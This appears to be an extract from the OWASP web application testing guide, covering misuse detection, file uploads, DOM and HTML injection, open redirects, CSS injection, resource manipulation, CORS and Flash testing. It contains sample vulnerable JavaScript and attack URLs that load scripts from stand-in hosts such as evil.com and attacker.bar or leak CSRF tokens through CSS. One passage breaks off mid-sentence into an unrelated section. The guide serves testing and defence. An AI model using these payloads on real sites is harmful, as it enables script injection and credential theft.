[1] Attempts to access a file ID their role is not permitted to download
[2] Substitutes a single tick (') instead of the file ID number
[3] Alters a GET request to a POST
[4] Adds an extra parameter
[5] Duplicates a parameter name/value pair

The application is monitoring for misuse and responds after the 5th event with extremely high confidence that the user is an attacker. For example the application:
• Disables critical functionality
• Enables additional authentication steps for the remaining functionality
• Adds time-delays into every request-response cycle
• Begins to record additional data about the user's interactions (e.g. sanitized HTTP request headers, bodies and response bodies)

If the application does not respond in any way and the attacker can continue to abuse functionality and submit clearly malicious content at the application, the application has failed this test case. In practice the discrete example actions above are unlikely to occur like that. It is much more probable that a fuzzing tool is used to identify weaknesses in each parameter in turn. This is what a security tester will have undertaken too.

How to Test
This test is unusual in that the result can be drawn from all the other tests performed against the web application. While performing all the other tests, take note of measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account

These may only be localised. Common localized (per function) defenses are:
• Rejecting input containing certain characters
• Locking out an account temporarily after a number of authentication failures

Localized security controls are not sufficient. There are often no defenses against general mis-use such as:
• Forced browsing
• Bypassing presentation layer input validation
• Multiple access control errors
• Additional, duplicated or missing parameter names
• Multiple input validation or business logic verification failures with values that cannot be the result of user mistakes or typos
• Structured data (e.g. JSON, XML) of an invalid format is received
• Blatant cross-site scripting or SQL injection payloads are received
• Utilising the application faster than would be possible without automation tools
• Change in continental geo-location of a user
• Change of user agent
• Accessing a multi-stage business process in the wrong order
• Large number of, or high rate of use of, application-specific functionality (e.g. voucher code submission, failed credit card payments, file uploads, file downloads, log outs, etc.)

These defenses work best in authenticated parts of the application, although rate of creation of new accounts or accessing content (e.g. to scrape information) can be of use in public areas.

Not all of the above need to be monitored by the application, but there is a problem if none of them are. By testing the web application, doing the above types of actions, was any response taken against the tester? If not, the tester should report that the application appears to have no application-wide active defenses against misuse. Note it is sometimes possible that all responses to attack detection are silent to the user (e.g.
logging changes, increased monitoring, alerts to administrators and and request proxying), so confidence in this finding cannot be guaranteed. In practice, very few applications (or related infrastructure such as a web application firewall) are detecting these types of misuse. Related Test Cases All other test cases are relevant. Tools The tester can use many of the tools used for the other test cases. References • Resilient Software, Software Assurance, US Department Homeland Security • IR 7684 Common Misuse Scoring System (CMSS), NIST • Common Attack Pattern Enumeration and Classification (CAPEC), The Mitre Corporation • OWASP_AppSensor_Project • AppSensor Guide v2, OWASP • Watson C, Coates M, Melton J and Groves G, Creating Attack Aware Software Applications with Real-Time Defenses, CrossTalk The Journal of Defense Software Engineering, Vol. 24, No. 5, Sep/Oct 2011 Test Upload of Unexpected File Types (OTG-BUSLOGIC-008) Summary Many application’s business processes allow for the upload and manipulation of data that is submitted via files. But the business process must check the files and only allow certain “approved” file types. Deciding what files are “approved” is determined by the business logic and is application/system specific. The risk in that by allowing users to upload files, attackers may submit an unexpected file type that that could be executed and adversely impact the application or system through attacks that may deface the web site, perform remote commands, browse the system files, browse the local resources, attack other servers, or exploit the local vulnerabilities, just to name a few. Vulnerabilities related to the upload of unexpected file types is unique in that the upload should quickly reject a file if it does not have a specific extension. Additionally, this is different from uploading malicious files in that in most cases an incorrect file format may not by it self be inherently “malicious” but may be detrimental to the saved data. For example if an application accepts Windows Excel files, if an similar database file is uploaded it may be read but data extracted my be moved to incorrect locations. The application may be expecting only certain file types to be uploaded for processing, such as .CSV, .txt files. The application may not validate the uploaded file by extension (for low assurance file validation) or content (high assurance file validation). This may result in unexpected system or database results within the application/system or give attackers additional methods to exploit the application/system. Example Suppose a picture sharing application allows users to upload a .gif or .jpg graphic file to the web site. What if an attacker is able to upload an html file with a to the affected page URL which would, when executed, display the alert box. In this instance, the appended code would not be sent to the server as everything after the # character is not treated as part of the query by the browser but as a fragment. In this example, the code is immediately executed and an alert of “xss” is displayed by the page. Unlike the more common types of cross 189 Web Application Penetration Testing site scripting (Stored and Reflected) in which the code is sent to the server and then back to the browser, this is executed directly in the user’s browser without server contact. The consequences of DOM-based XSS flaws are as wide ranging as those seen in more well known forms of XSS, including cookie retrieval, further malicious script injection, etc. 
and should therefore be treated with the same severity. Black Box testing Blackbox testing for DOM-Based XSS is not usually performed since access to the source code is always available as it needs to be sent to the client to be executed. Gray Box testing Testing for DOM-Based XSS vulnerabilities: JavaScript applications differ significantly from other types of applications because they are often dynamically generated by the server, and to understand what code is being executed, the website being tested needs to be crawled to determine all the instances of JavaScript being executed and where user input is accepted. Many websites rely on large libraries of functions, which often stretch into the hundreds of thousands of lines of code and have not been developed in-house. In these cases, top-down testing often becomes the only really viable option, since many bottom level functions are never used, and analyzing them to determine which are sinks will use up more time than is often available. The same can also be said for top-down testing if the inputs or lack thereof is not identified to begin with. User input comes in two main forms: • Input written to the page by the server in a way that does not allow direct XSS • Input obtained from client-side JavaScript objects Here are two examples of how the server may insert data into JavaScript: And here are two examples of input from client-side JavaScript objects: While there is little difference to the JavaScript code in how they are retrieved, it is important to note that when input is received via the server, the server can apply any permutations to the data that it desires, whereas the permutations performed by JavaScript objects are fairly well understood and documented, and so if someFunction in the above example were a sink, then the exploitability of the former would depend on the filtering done by the server, whereas the latter would depend on the encoding done by the browser on the window.referer object. Stefano Di Paulo has written an excellent article on what browsers return when asked for the various elements of a URL using the document. and location. attributes. Additionally, JavaScript is often executed outside of The above code contains a source ‘location.hash’ that is controlled by the attacker that can inject directly in the ‘message’ value a JavaScript Code to take the control of the user browser. References OWASP Resources • DOM based XSS Prevention Cheat Sheet • DOMXSS.com - http://www.domxss.com Whitepapers • Browser location/document URI/URL Sources - https://code google.com/p/domxsswiki/wiki/LocationSources • i.e., what is returned when the user asks the browser for things like document.URL, document.baseURI, location, location.href, etc. Testing for HTML Injection (OTG-CLIENT-003) Summary HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. How to Test This vulnerability occurs when the user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. 
The targeted browser will not be able to distinguish (trust) the legitimate parts from the malicious parts, and consequently will parse and execute all of it as legitimate in the victim's context.

There is a wide range of methods and attributes that can be used to render HTML content. If these methods are provided with untrusted input, then there is a high risk of XSS, specifically of HTML injection. Malicious HTML code can be injected, for example, via innerHTML, which is used to render user-inserted HTML code. If strings are not correctly sanitized, the problem could lead to XSS-based HTML injection. Another method is document.write(). When trying to exploit this kind of issue, consider that some characters are treated differently by different browsers. For reference see the DOM XSS Wiki.

The innerHTML property sets or returns the inner HTML of an element. Improper usage of this property, meaning a lack of sanitization of untrusted input and missing output encoding, could allow an attacker to inject malicious HTML code.

Example of Vulnerable Code:
The following example shows a snippet of vulnerable code that allows unvalidated input to be used to create dynamic HTML in the page context:

var userposition=location.href.indexOf("user=");
var user=location.href.substring(userposition+5);
document.getElementById("Welcome").innerHTML="Hello, "+user;

In the same way, the following example shows vulnerable code using the document.write() function:

var userposition=location.href.indexOf("user=");
var user=location.href.substring(userposition+5);
document.write("Hello, " + user);
In both examples, an input like the following:

http://vulnerable.site/page.html?user=<img%20src='x'%20onerror='alert(1)'>

will add to the page an image tag that executes arbitrary JavaScript code inserted by the malicious user in the HTML context.

Black Box testing
Black box testing for HTML Injection is not usually performed since access to the source code is always available, as it needs to be sent to the client to be executed.

Gray Box testing
Testing for HTML Injection vulnerabilities:
For example, looking at the following URL:

http://www.domxss.com/domxss/01_Basics/06_jquery_old_html.html

The HTML code of the page contains a script that writes user-controllable input into the page:
Show HereShowing Message2
Show HereShowing Message3
It is possible to inject HTML code.
References
OWASP Resources
• DOM based XSS Prevention Cheat Sheet
• DOMXSS.com - http://www.domxss.com
Whitepapers
• Browser location/document URI/URL Sources - https://code.
google.com/p/domxsswiki/wiki/LocationSources
• i.e., what is returned when the user asks the browser for things
like document.URL, document.baseURI, location, location.href,
etc.
Testing for Client Side URL Redirect
(OTG-CLIENT-004)
Summary
This section describes how to check for Client Side URL Redirection, also known as Open Redirection. It is an input validation flaw
that exists when an application accepts a user-controlled input
which specifies a link that leads to an external URL that could be
malicious. This kind of vulnerability could be used to accomplish a
phishing attack or redirect a victim to an infection page.
How to Test
This vulnerability occurs when an application accepts untrusted
input that contains a URL value without sanitizing it. This URL
value could cause the web application to redirect the user to another page, for example a malicious page controlled by the
attacker.
By modifying untrusted URL input to a malicious site, an attacker
may successfully launch a phishing scam and steal user credentials. Since the redirection originates from the real application,
the phishing attempt may have a more trustworthy appearance.
A phishing attack example could be the following:
http://www.target.site?#redirect=www.fake-target.site
The victim that visits target.site will be automatically redirected
to fake-target.site where an attacker could place a fake page to
steal victim’s credentials.
Moreover, open redirects could also be used to maliciously
craft a URL that would bypass the application's access control
checks and then forward the attacker to privileged functions
that they would normally not be able to access.
Black Box testing
Black box testing for Client Side URL Redirect is not usually performed since access to the source code is always available as it
needs to be sent to the client to be executed.
Gray Box testing
Testing for Client Side URL Redirect vulnerabilities:
When testers have to manually check for this type of vulnerability, they need to identify whether there are client-side redirections implemented in the client-side code (for example, in the JavaScript code).
These redirections may be implemented, for example in JavaScript, using the "window.location" object, which can be used to take
the browser to another page by simply assigning a string to it, as
you can see in the following snippet of code.
var redir = location.hash.substring(1);
if (redir)
window.location=’http://’+decodeURIComponent(redir);
In the previous example the script does not perform any validation of the variable "redir", which contains the user-supplied input
taken from the URL fragment, and at the same time does not apply any
form of encoding. This unvalidated input is then passed to the
window.location object, originating a URL redirection vulnerability.
This implies that an attacker could redirect the victim to a malicious site simply by submitting the following query string:
http://www.victim.site/?#www.malicious.site
Note that if the vulnerable code is the following:
var redir = location.hash.substring(1);
if (redir)
    window.location = decodeURIComponent(redir);
it would also be possible to inject JavaScript code, for example by submitting the following query string:
http://www.victim.site/?#javascript:alert(document.cookie)
When trying to check for this kind of issue, consider that some characters are treated differently by different browsers. Moreover, always consider trying absolute URL variants as described here: http://kotowicz.net/absolute/
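As a point of comparison when reviewing code, a safer variant (a minimal sketch, not taken from the application under test; the whitelist values are hypothetical) validates the fragment against a list of allowed local destinations before assigning it to window.location:

var redir = location.hash.substring(1);
// hypothetical whitelist of allowed local destinations
var allowed = ["home", "profile", "settings"];
if (allowed.indexOf(redir) !== -1) {
    window.location = "/" + redir;
}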
Tools
• DOMinator - https://dominator.mindedsecurity.com/
References
OWASP Resources
• DOM based XSS Prevention Cheat Sheet
• DOMXSS.com - http://www.domxss.com
Whitepapers
• Browser location/document URI/URL Sources - https://code.google.com/p/domxsswiki/wiki/LocationSources
• i.e., what is returned when you ask the browser for things like document.URL, document.baseURI, location, location.href, etc.
• Krzysztof Kotowicz: “Local or External? Weird URL formats on the loose” - http://kotowicz.net/absolute/
Testing for CSS Injection (OTG-CLIENT-005)
Summary
A CSS Injection vulnerability involves the ability to inject arbitrary CSS code in the context of a trusted web site, where it is rendered inside the victim’s browser. The impact of such a vulnerability varies with the supplied CSS payload: it could lead to Cross-Site Scripting in particular circumstances, to exfiltration of sensitive data, or to UI modifications.
How to Test
Such a vulnerability occurs when the application allows users to supply CSS, or when it is possible to somehow interfere with the legitimate stylesheets. Injecting code in the CSS context gives the attacker the possibility to execute JavaScript under certain conditions, as well as to extract sensitive values through CSS selectors and functions able to generate HTTP requests. Giving users the ability to customize their own pages with custom CSS files is a considerable risk and should definitely be avoided.
The following JavaScript code shows a possible vulnerable script in which the attacker is able to control the “location.hash” (source), which reaches the “cssText” property (sink). This particular case may lead to DOM-based XSS in older browser versions, such as Opera, Internet Explorer and Firefox; for reference see the DOM XSS Wiki, section “Style Sinks”.
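A minimal sketch of such a pattern (an illustrative reconstruction, assuming an element with id "a1") could be:

<a id="a1" href="#">Click me</a>
<script>
  // the URL fragment (source) reaches style.cssText (sink) without validation
  var source = location.hash.substring(1);
  document.getElementById("a1").style.cssText = "color: " + source;
</script>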
Specifically the attacker could target the victim by asking her to
visit the following URLs:
• www.victim.com/#red;-o-link:’javascript:alert(1)’;-o-linksource:current; (Opera [8,12])
• www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)
The same vulnerability may also appear in the case of classical reflected XSS, for instance when server-side PHP code reflects user input directly into a style attribute or a style block.
Much more interesting attack scenarios involve the possibility to extract data through the adoption of pure CSS rules. Such attacks can be conducted through CSS selectors, leading for instance to the theft of anti-CSRF tokens. In particular, the selector input[name=csrf_token][value^=a] matches an input element whose attribute “name” is set to “csrf_token” and whose attribute “value” starts with “a”. By detecting the length of the attribute “value”, it is possible to carry out a brute force attack against it and send its value to the attacker’s domain.
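As an illustration (a hedged sketch; the attacker host attacker.example is hypothetical), an injected rule of this kind could look like:

<style>
  /* if the token value starts with "a", the browser requests the background
     image and thereby leaks this fact to the attacker-controlled host */
  input[name=csrf_token][value^="a"] {
    background-image: url(https://attacker.example/leak?prefix=a);
  }
</style>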
Much more modern attacks involving a combination of SVG, CSS and HTML5 have been proven feasible; see the References section for details.
Black Box testing
Since this is client-side testing, black box testing is not usually performed: access to the source code is always available, as it needs to be sent to the client to be executed. However, the user may be given a certain degree of freedom to supply HTML code; in that case it is necessary to verify that no CSS injection is possible: tags like “link” and “style” should be disallowed, as well as the “style” attribute.
Gray Box testing
Testing for CSS Injection vulnerabilities:
Manual testing needs to be conducted and the JavaScript code analyzed in order to understand whether an attacker can inject their own content in the CSS context. In particular, we should be interested in how the website returns CSS rules on the basis of user input.
The following is a basic example:
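A minimal sketch of such a page (an illustrative reconstruction, assuming jQuery is loaded and that the two elements show the texts “Click me” and “Hi”) might be:

<a id="a1" href="#">Click me</a>
<b id="b1">Hi</b>
<script>
  // the URL fragment (source) is written into the "style" attribute (sink)
  $("#b1").attr("style", "color: " + location.hash.slice(1));
</script>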
The above code contains a source, “location.hash”, that is controlled by the attacker, who can inject directly into the “style” attribute of an HTML element. As mentioned above, this may lead to different results depending on the browser in use and the supplied payload.
It is recommended to use the jQuery function css(property, value) in such circumstances, as shown below, since this disallows damaging injections. In general, we recommend always using a whitelist of allowed characters any time the input is reflected in the CSS context.
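A hedged sketch of the safer variant, under the same assumptions, could be:

<a id="a1" href="#">Click me</a>
<b id="b1">Hi</b>
<script>
  // css(property, value) treats the input as a single CSS value,
  // so additional properties or expressions cannot be smuggled in
  $("#b1").css("color", location.hash.slice(1));
</script>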
References
OWASP Resources
• DOM based XSS Prevention Cheat Sheet
• DOMXSS Wiki - https://code.google.com/p/domxsswiki/wiki/CssText
Presentations
• DOM Xss Identification and Exploitation, Stefano Di Paola - http://dominator.googlecode.com/files/DOMXss_Identification_and_exploitation.pdf
• Got Your Nose! How To Steal Your Precious Data Without
Using Scripts, Mario Heiderich - http://www.youtube.com/
watch?v=FIQvAaZj_HA
• Bypassing Content-Security-Policy, Alex Kouzemtchenko
http://ruxcon.org.au/assets/slides/CSP-kuza55.pptx
Proof of Concepts
• Password “cracker” via CSS and HTML5 - http://html5sec.org/invalid/?length=25
• CSS attribute reading - http://eaea.sirdarckcat.net/cssar/v2/
Testing for Client Side Resource Manipulation
(OTG-CLIENT-006)
Summary
A Client Side Resource Manipulation vulnerability is an input validation flaw that occurs when an application accepts user-controlled input specifying the path of a resource (for example the source of an iframe, a script, an applet, or the handler of an XMLHttpRequest). Specifically, such a vulnerability consists in the ability to control the URLs which link to resources present in a web page. The impact varies with the type of element whose URL is controlled by the attacker, and the flaw is usually exploited to conduct Cross-Site Scripting attacks.
How to Test
Such a vulnerability occurs when the application employs user-controlled URLs for referencing external or internal resources. In these circumstances it is possible to interfere with the expected application behavior by making it load and render malicious objects.
The following JavaScript code shows a possible vulnerable script in which the attacker is able to control the “location.hash” (source), which reaches the attribute “src” of a script element (sink). This obviously leads to XSS, since external JavaScript can easily be injected into the trusted web site.
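A minimal sketch of this pattern (an illustrative reconstruction, not the original test case) could be:

<script>
  // the URL fragment (source) becomes the src of a new script element (sink)
  var s = document.createElement("script");
  s.src = location.hash.substring(1);
  document.getElementsByTagName("head")[0].appendChild(s);
</script>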
Specifically the attacker could target the victim by asking her to
visit the following URL:
www.victim.com/#http://evil.com/js.js
Where js.js contains:
alert(document.cookie)
Controlling the sources of scripts is a basic example; other interesting and more subtle cases can occur. A widespread scenario involves the possibility to control the URL called in a CORS request; since CORS allows the target resource to be accessible by the requesting domain through a header-based approach, the attacker may make the target page load malicious content hosted on his own web site.
Refer to the following vulnerable code:
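A minimal sketch of such code (an illustrative reconstruction, assuming a container element with id "result") could be:

<div id="result"></div>
<script>
  // the URL fragment (source) is used as the target of a cross-origin request
  var url = location.hash.substring(1);
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4) {
      // the response is reflected into the DOM without sanitization (sink)
      document.getElementById("result").innerHTML = xhr.responseText;
    }
  };
  xhr.open("GET", url, true);
  xhr.send();
</script>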
The “location.hash” is controlled by the attacker and is used to request an external resource, which will then be reflected through the “innerHTML” construct. Basically, the attacker could ask the victim to visit the following URL while hosting the crafted payload at the referenced location.
Exploit URL: www.victim.com/#http://evil.com/html.html
Gray Box testing
Testing for Client Side Resource Manipulation vulnerabilities:
To manually check for this type of vulnerability, we have to identify whether the application employs inputs without correctly validating them; if these are under the control of the user, they could be used to specify the URL of certain resources. Since many resources can be included in the application (for example images, video, objects, CSS, frames, etc.), client side scripts which handle the associated URLs should be investigated for potential issues.
The following table shows the possible injection points (sink)
that should be checked:
Resource        Tag / Method                        Sink
Frame           iframe                              src
Link            a                                   href
AJAX Request    xhr.open(method, [url], true);      URL
CSS             link                                href
Image           img                                 src
Object          object                              data
Script          script                              src
The most interesting sinks are those that allow an attacker to include client side code (for example JavaScript), since they could lead to XSS vulnerabilities.
When trying to check for this kind of issue, consider that some characters are treated differently by different browsers. Moreover, always consider trying absolute URL variants as described here: http://kotowicz.net/absolute/
Black Box testing
Black box testing for Client Side Resource Manipulation is not usually performed, since access to the source code is always available as it needs to be sent to the client to be executed.
Tools
• DOMinator - https://dominator.mindedsecurity.com/
References
OWASP Resources
• DOM based XSS Prevention Cheat Sheet
• DOMXSS.com - http://www.domxss.com
• DOMXSS TestCase - http://www.domxss.com/domxss/01_Basics/04_script_src.html
Whitepapers
• DOM XSS Wiki - https://code.google.com/p/domxsswiki/wiki/LocationSources
• Krzysztof Kotowicz: “Local or External? Weird URL formats on the loose” - http://kotowicz.net/absolute/
Test Cross Origin Resource Sharing
(OTG-CLIENT-007)
Summary
Cross Origin Resource Sharing or CORS is a mechanism that enables a web browser to perform “cross-domain” requests using
the XMLHttpRequest L2 API in a controlled manner. In the past,
the XMLHttpRequest L1 API only allowed requests to be sent
within the same origin as it was restricted by the same origin
policy.
Cross-Origin requests have an Origin header, that identifies the
domain initiating the request and is always sent to the server.
CORS defines the protocol to use between a web browser and a
server to determine whether a cross-origin request is allowed.
To accomplish this goal, a few HTTP headers are involved in this process. They are supported by all major browsers and are covered below: Origin, Access-Control-Request-Method, Access-Control-Request-Headers, Access-Control-Allow-Origin, Access-Control-Allow-Credentials, Access-Control-Allow-Methods, Access-Control-Allow-Headers.
The CORS specification mandates that for non-simple requests, such as requests using methods other than GET or POST or requests that use credentials, a pre-flight OPTIONS request must be sent in advance to check whether the type of request will have a bad impact on the data. The pre-flight request checks the methods and headers allowed by the server, and whether credentials are permitted; based on the result of the OPTIONS request, the browser decides whether the request is allowed or not.
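As an illustration (a hedged sketch with hypothetical hosts and headers), a preflight exchange could look like the following:

OPTIONS /api/resource HTTP/1.1
Host: example.foo
Origin: http://requester.bar
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: X-Custom-Header

HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://requester.bar
Access-Control-Allow-Methods: PUT
Access-Control-Allow-Headers: X-Custom-Header
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 1800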
How to Test
Origin & Access-Control-Allow-Origin
The Origin header is always sent by the browser in a CORS request and indicates the origin of the request. The Origin header cannot be changed from JavaScript; however, relying on this header for access control checks is not a good idea, as it may be spoofed outside the browser, so you still need to check that application-level protections are used to protect sensitive data.
Access-Control-Allow-Origin is a response header used by a server to indicate which domains are allowed to read the response. Based on the CORS W3C specification, it is up to the client to determine and enforce the restriction of whether the client has access to the response data based on this header.
From a penetration testing perspective, you should look for insecure configurations, for example the use of a ‘*’ wildcard as the value of the Access-Control-Allow-Origin header, which means all domains are allowed. Another insecure example is when the server echoes back the Origin header value without any additional checks, which can lead to access to sensitive data. Note that these configurations are very insecure and are not acceptable in general terms, except in the case of a public API that is intended to be accessible by everyone.
Access-Control-Request-Method & Access-Control-Allow-Methods
The Access-Control-Request-Method header is used when a browser performs a preflight OPTIONS request and lets the client indicate the request method of the final request. On the other hand, Access-Control-Allow-Methods is a response header used by the server to describe the methods the clients are allowed to use.
Access-Control-Request-Headers & Access-Control-Allow-Headers
These two headers are used between the browser and the server
to determine which headers can be used to perform a cross-origin request.
Access-Control-Allow-Credentials
This header, returned as part of a preflight response, indicates that the final request can include user credentials.
Input validation
XMLHttpRequest L2 (or XHR L2) introduces the possibility of creating cross-domain requests using the XHR API, while remaining backwards compatible. This can introduce security vulnerabilities that were not present with XHR L1. Interesting points of the code to exploit would be URLs that are passed to XMLHttpRequest without validation, especially if absolute URLs are allowed, because that could lead to code injection. Likewise, another part of the application that can be exploited is response data that is not escaped and that we can control by providing user-supplied input.
Other headers
Other headers are involved, like Access-Control-Max-Age, which determines the time a preflight request can be cached in the browser, or Access-Control-Expose-Headers, which indicates which response headers can safely be exposed to the client-side API. Both are response headers specified in the CORS W3C document.
Black Box testing
Black box testing for finding issues related to Cross Origin Resource Sharing is not usually performed since access to the
source code is always available as it needs to be sent to the client
to be executed.
Gray Box testing
Check the HTTP headers in order to understand how CORS is used; in particular, look at the Origin request header and the Access-Control-Allow-Origin response header to learn which domains are allowed. Also, manual inspection of the JavaScript is needed to determine whether the code is vulnerable to code injection due to improper handling of user-supplied input. Below are some examples:
Example 1: Insecure response with wildcard ‘*’ in Access-Control-Allow-Origin:
Request (note the ‘Origin’ header):
GET http://attacker.bar/test.php HTTP/1.1
Host: attacker.bar
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;
rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://example.foo/CORSexample1.html
Origin: http://example.foo
Connection: keep-alive
Response (note the ‘Access-Control-Allow-Origin’ header):
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:57:53 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: *
Content-Length: 4
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: application/xml
[Response Body]
Example 2: Input validation issue, XSS with CORS:
This code makes a request to the resource passed after the # character in the URL, and was initially used to retrieve resources from the same server.
Vulnerable code:
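A hedged sketch of such code (an illustrative reconstruction, assuming a container element with id "profile-container") could be:

<div id="profile-container"></div>
<script>
  // the resource name after "#" (source) is requested via XHR and the
  // response is written into the page via innerHTML (sink)
  var resource = location.hash.substring(1);
  var req = new XMLHttpRequest();
  req.onreadystatechange = function () {
    if (req.readyState === 4 && req.status === 200) {
      document.getElementById("profile-container").innerHTML = req.responseText;
    }
  };
  req.open("GET", resource, true);
  req.send();
</script>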
For example, a request like this will show the contents of the
profile.php file:
http://example.foo/main.php#profile.php
Request and response generated by this URL:
GET http://example.foo/profile.php HTTP/1.1
Host: example.foo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;
rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://example.foo/main.php
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:20:48 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze17
Vary: Accept-Encoding
Content-Length: 25
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html
[Response Body]
Now, as there is no URL validation, we can inject a remote script that will be executed in the context of the example.foo domain, with a URL like this:
http://example.foo/main.php#http://attacker.bar/file.php
Request and response generated by this URL:
GET http://attacker.bar/file.php HTTP/1.1
Host: attacker.bar
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;
rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://example.foo/main.php
Origin: http://example.foo
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 19:00:32 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Content-Length: 92
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Injected Content from attacker.bar
Tools
• OWASP Zed Attack Proxy (ZAP) - https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
ZAP is an easy to use integrated penetration testing tool for
finding vulnerabilities in web applications. It is designed to be
used by people with a wide range of security experience and as
such is ideal for developers and functional testers who are new
to penetration testing. ZAP provides automated scanners as
well as a set of tools that allow you to find security vulnerabilities manually.
References
OWASP Resources
• OWASP HTML5 Security Cheat Sheet: https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
Whitepapers
• W3C - CORS W3C Specification: http://www.w3.org/TR/cors/
Testing for Cross site flashing
(OTG-CLIENT-008)
Summary
ActionScript is the language, based on ECMAScript, used by Flash
applications when dealing with interactive needs. There are three
versions of the ActionScript language. ActionScript 1.0 and ActionScript 2.0 are very similar with ActionScript 2.0 being an extension of
ActionScript 1.0. ActionScript 3.0, introduced with Flash Player 9, is a
rewrite of the language to support object-oriented design.
ActionScript, like every other language, has some implementation
patterns which could lead to security issues. In particular, since Flash
applications are often embedded in browsers, vulnerabilities like
DOM based Cross-Site Scripting (XSS) could be present in flawed
Flash applications.
How to Test
Since the first publication of “Testing Flash Applications” [1], new
versions of Flash player were released in order to mitigate some of
the attacks which will be described. Nevertheless, some issues still
remain exploitable because they are the result of insecure programming practices.
Decompilation
Since SWF files are interpreted by a virtual machine embedded in the
player itself, they can be potentially decompiled and analysed. The
best known free ActionScript 2.0 decompiler is flare.
To decompile a SWF file with flare just type:
$ flare hello.swf
This will result in a new file called hello.flr.
Decompilation helps testers because it allows for source code assisted, or white-box, testing of Flash applications. HP’s free SWFScan tool can decompile both ActionScript 2.0 and ActionScript 3.0.
The OWASP Flash Security Project maintains a list of current disassemblers, decompilers and other Adobe Flash related testing tools.
Undefined Variables FlashVars
FlashVars are the variables that the SWF developer planned on receiving from the web page. FlashVars are typically passed in from
the Object or Embed tag within the HTML. For instance:
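A hedged sketch of such markup (illustrative only; the file name somefilename.swf is taken from the URL example below, all other attributes are assumptions) could be:

<object width="550" height="400"
        classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
  <param name="movie" value="somefilename.swf" />
  <param name="FlashVars" value="var1=val1&var2=val2" />
  <embed src="somefilename.swf" FlashVars="var1=val1&var2=val2"
         width="550" height="400" />
</object>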
FlashVars can also be initialized from the URL:
http://www.example.org/somefilename.swf?var1=val1&var2=val2
In ActionScript 3.0, a developer must explicitly assign the FlashVar
values to local variables. Typically, this looks like:
var paramObj:Object = LoaderInfo(this.root.loaderInfo).parameters;
var var1:String = String(paramObj["var1"]);
var var2:String = String(paramObj["var2"]);
In ActionScript 2.0, any uninitialized global variable is assumed to be
a FlashVar. Global variables are those variables that are prepended
by _root, _global or _level0. This means that if an attribute like:
_root.varname
is undefined throughout the code flow, it could be overwritten by
setting
http://victim/file.swf?varname=value
Regardless of whether you are looking at ActionScript 2.0 or ActionScript 3.0, FlashVars can be a vector of attack. Let’s look at some ActionScript 2.0 code that is vulnerable:
Example:
movieClip 328 __Packages.Locale {
  #initclip
  if (!_global.Locale) {
    var v1 = function (on_load) {
      var v5 = new XML();
      var v6 = this;
      v5.onLoad = function (success) {
        if (success) {
          trace('Locale loaded xml');
          var v3 = this.xliff.file.body.$trans_unit;
          var v2 = 0;
          while (v2 < v3.length) {
            Locale.strings[v3[v2]._resname] = v3[v2].source.__text;
            ++v2;
          }
          on_load();
        } else {}
      };
      if (_root.language != undefined) {
        Locale.DEFAULT_LANG = _root.language;
      }
      v5.load(Locale.DEFAULT_LANG + '/player_' + Locale.DEFAULT_LANG + '.xml');
    };
The above code could be attacked by requesting:
http://victim/file.swf?language=http://evil.example.org/malicious.xml?
Unsafe Methods
When an entry point is identified, the data it represents could be used by unsafe methods. If the data is not filtered or validated using an appropriate whitelist or regular expression, it could lead to a security issue.
Unsafe methods since version r47 are:
loadVariables()
loadMovie()
getURL()
loadMovieNum()
FScrollPane.loadScrollContent()
LoadVars.load
LoadVars.send
XML.load ( 'url' )
LoadVars.load ( 'url' )
Sound.loadSound( 'url' , isStreaming );
NetStream.play( 'url' );
flash.external.ExternalInterface.call(_root.callback)
htmlText
The Test
In order to exploit a vulnerability, the SWF file should be hosted on the victim's host and the techniques of reflected XSS must be used. That is, the browser is forced to load a pure SWF file directly in the location bar (by redirection or social engineering), or to load it through an iframe from an evil page:
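A hedged sketch of such an evil page (the path to the SWF is illustrative) could be:

<iframe src="http://victim/path/to/file.swf"></iframe>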
This is because in this situation the browser will self-generate an
HTML page as if it were hosted by the victim host.
XSS
GetURL (AS2) / NavigateToURL (AS3):
The GetURL function in ActionScript 2.0 and NavigateToURL in ActionScript 3.0 lets the movie load a URI into the browser’s window.
So if an undefined variable is used as the first argument for getURL:
getURL(_root.URI, '_targetFrame');
Or if a FlashVar is used as the parameter that is passed to a navigateToURL function:
var request:URLRequest = new URLRequest(FlashVarSuppliedURL);
navigateToURL(request);
